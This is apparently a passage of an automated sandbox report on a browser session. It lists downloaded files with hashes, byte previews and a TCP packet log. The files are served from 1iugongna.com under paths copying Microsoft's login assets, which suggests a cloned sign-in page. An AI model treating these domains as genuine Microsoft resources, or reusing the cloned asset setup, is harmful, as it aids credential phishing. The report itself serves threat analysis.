                                                                              Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                              Category:downloaded
                                                                              Size (bytes):17174
                                                                              Entropy (8bit):2.9129715116732746
                                                                              Encrypted:false
                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://1iugongna.com/aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                              Category:downloaded
                                                                              Size (bytes):1435
                                                                              Entropy (8bit):7.8613342322590265
                                                                              Encrypted:false
                                                                              SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                              MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                              SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                              SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                              SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://1iugongna.com/aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
                                                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):72
                                                                              Entropy (8bit):4.241202481433726
                                                                              Encrypted:false
                                                                              SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                              MD5:9E576E34B18E986347909C29AE6A82C6
                                                                              SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                              SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                              SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text
                                                                              Category:downloaded
                                                                              Size (bytes):689017
                                                                              Entropy (8bit):4.210697599646938
                                                                              Encrypted:false
                                                                              SSDEEP:6144:rnQWWDY3mr16XRxcpuEhjMPRKkC0d7xyF0FA9OgoUE0HUN4oe+:rBWU3xhDKkTshoj5
                                                                              MD5:3E89AE909C6A8D8C56396830471F3373
                                                                              SHA1:2632F95A5BE7E4C589402BF76E800A8151CD036B
                                                                              SHA-256:6665CA6A09F770C6679556EB86CF4234C8BDB0271049620E03199B34B4A16099
                                                                              SHA-512:E7DBE4E95D58F48A0C8E3ED1F489DCF8FBF39C3DB27889813B43EE95454DECA2816AC1E195E61A844CC9351E04F97AFA271B37CAB3FC522809CE2BE85CC1B8F0
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://1iugongna.com/aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                                              Preview:.!(function (e) {. function n(n) {. for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++). (i = o[s]),. Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]),. (a[i] = 0);. for (t in r) Object.prototype.hasOwnProperty.call(r, t) && (e[t] = r[t]);. for (d && d(n); c.length; ) c.shift()();. }. var t,. i = {},. a = { 22: 0 };. function o(n) {. if (i[n]) return i[n].exports;. var t = (i[n] = { i: n, l: !1, exports: {} });. return e[n].call(t.exports, t, t.exports, o), (t.l = !0), t.exports;. }. Function.prototype.bind ||. ((t = Array.prototype.slice),. (Function.prototype.bind = function (e) {. if ("function" != typeof this). throw new TypeError(. "Function.prototype.bind - what is trying to be bound is not callable". );. var n = t.call(arguments, 1),. i = n.length,. a = this,. o = function () {},. r = function () {. return (.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):61
                                                                              Entropy (8bit):3.990210155325004
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                              Category:dropped
                                                                              Size (bytes):673
                                                                              Entropy (8bit):7.6596900876595075
                                                                              Encrypted:false
                                                                              SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                              MD5:0E176276362B94279A4492511BFCBD98
                                                                              SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                              SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                              SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):28
                                                                              Entropy (8bit):4.307354922057605
                                                                              Encrypted:false
                                                                              SSDEEP:3:8Kiun9ks:8Kiun2s
                                                                              MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                                                              SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                                                              SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                                                              SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlqmxMSGTKRfBIFDdFbUVISBQ1Xevf9?alt=proto
                                                                              Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:GIF image data, version 89a, 352 x 3
                                                                              Category:downloaded
                                                                              Size (bytes):2672
                                                                              Entropy (8bit):6.640973516071413
                                                                              Encrypted:false
                                                                              SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                              MD5:166DE53471265253AB3A456DEFE6DA23
                                                                              SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                              SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                              SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://1iugongna.com/aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif
                                                                              Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                              Category:dropped
                                                                              Size (bytes):621
                                                                              Entropy (8bit):7.673946009263606
                                                                              Encrypted:false
                                                                              SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                              MD5:4761405717E938D7E7400BB15715DB1E
                                                                              SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                              SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                              SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                              Category:downloaded
                                                                              Size (bytes):20410
                                                                              Entropy (8bit):7.980582012022051
                                                                              Encrypted:false
                                                                              SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                              MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                              SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                              SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                              SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://1iugongna.com/aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                              Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):22
                                                                              Entropy (8bit):3.6978458230844122
                                                                              Encrypted:false
                                                                              SSDEEP:3:jAbukMn:jP
                                                                              MD5:6AAB5444A217195068E4B25509BC0C50
                                                                              SHA1:7B22EAF7EAA9B7E1F664A0632D3894D406FE7933
                                                                              SHA-256:FC5525D427BFA27792D3A87411BE241C047D07F07C18E2FC36BF00B1C2E33D07
                                                                              SHA-512:AA5F66638B142B5E6D1D008F2934530C7AAD2F7F19128CA24609825D0DACFFD25A77591BFD7FB1D225BE2FA77CABCE837E0741326C1AC622C244D51E6FAFB303
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://banirego.com/favicon.ico
                                                                              Preview:<h1>Access Denied</h1>
                                                                              No static file info
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 10, 2025 21:41:22.489216089 CET49674443192.168.2.523.1.237.91
                                                                              Jan 10, 2025 21:41:22.489301920 CET49675443192.168.2.523.1.237.91
                                                                              Jan 10, 2025 21:41:22.598870039 CET49673443192.168.2.523.1.237.91
                                                                              Jan 10, 2025 21:41:32.093195915 CET49675443192.168.2.523.1.237.91
                                                                              Jan 10, 2025 21:41:32.093336105 CET49674443192.168.2.523.1.237.91
                                                                              Jan 10, 2025 21:41:32.202562094 CET49673443192.168.2.523.1.237.91
                                                                              Jan 10, 2025 21:41:33.878421068 CET4434970323.1.237.91192.168.2.5
                                                                              Jan 10, 2025 21:41:33.878541946 CET49703443192.168.2.523.1.237.91
                                                                              Jan 10, 2025 21:41:35.117326975 CET49712443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:41:35.117363930 CET44349712142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:41:35.117578030 CET49712443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:41:35.117710114 CET49712443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:41:35.117729902 CET44349712142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:41:35.768255949 CET44349712142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:41:35.768665075 CET49712443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:41:35.768676996 CET44349712142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:41:35.769686937 CET44349712142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:41:35.769762993 CET49712443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:41:35.771159887 CET49712443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:41:35.771238089 CET44349712142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:41:35.811805010 CET49712443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:41:35.811816931 CET44349712142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:41:35.858725071 CET49712443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:41:36.641594887 CET49714443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:36.641633987 CET44349714188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:36.641694069 CET49714443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:36.642241001 CET49714443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:36.642256975 CET44349714188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:36.653513908 CET49715443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:36.653549910 CET44349715188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:36.653611898 CET49715443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:36.653898954 CET49715443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:36.653911114 CET44349715188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.113817930 CET44349714188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.114172935 CET49714443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.114193916 CET44349714188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.115466118 CET44349714188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.115540028 CET49714443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.120377064 CET49714443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.120400906 CET49714443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.120466948 CET49714443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.120491982 CET44349714188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.120552063 CET49714443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.120831013 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.120874882 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.120945930 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.121140957 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.121149063 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.126771927 CET44349715188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.127008915 CET49715443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.127026081 CET44349715188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.128490925 CET44349715188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.128559113 CET49715443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.128901958 CET49715443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.128921986 CET49715443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.128968954 CET49715443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.128983974 CET44349715188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.129038095 CET49715443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.129260063 CET49718443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.129302979 CET44349718188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.129373074 CET49718443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.129555941 CET49718443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.129566908 CET44349718188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.581510067 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.581923962 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.581943035 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.583007097 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.583086967 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.584132910 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.584213972 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.584330082 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.584335089 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.605675936 CET44349718188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.606029034 CET49718443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.606040955 CET44349718188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.607074022 CET44349718188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.607141972 CET49718443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.607451916 CET49718443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.607512951 CET44349718188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.626272917 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.656142950 CET49718443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.656152964 CET44349718188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.702332973 CET49718443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.957026005 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.957113028 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.957145929 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.957170963 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.957196951 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.957206011 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.957227945 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.957252979 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.957259893 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.957267046 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.957272053 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.957320929 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.957410097 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.961724997 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:37.961785078 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:37.961793900 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:38.014576912 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:38.014607906 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:38.060879946 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:38.060909986 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:38.061089993 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:38.061156034 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:38.061187983 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:38.061217070 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:38.061230898 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:38.061233044 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:38.061280966 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:38.132002115 CET49719443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:41:38.132064104 CET4434971935.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:41:38.132132053 CET49719443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:41:38.133089066 CET49719443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:41:38.133121014 CET4434971935.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:41:38.139859915 CET49717443192.168.2.5188.114.97.3
                                                                              Jan 10, 2025 21:41:38.139893055 CET44349717188.114.97.3192.168.2.5
                                                                              Jan 10, 2025 21:41:38.180926085 CET49718443192.168.2.5188.114.97.3
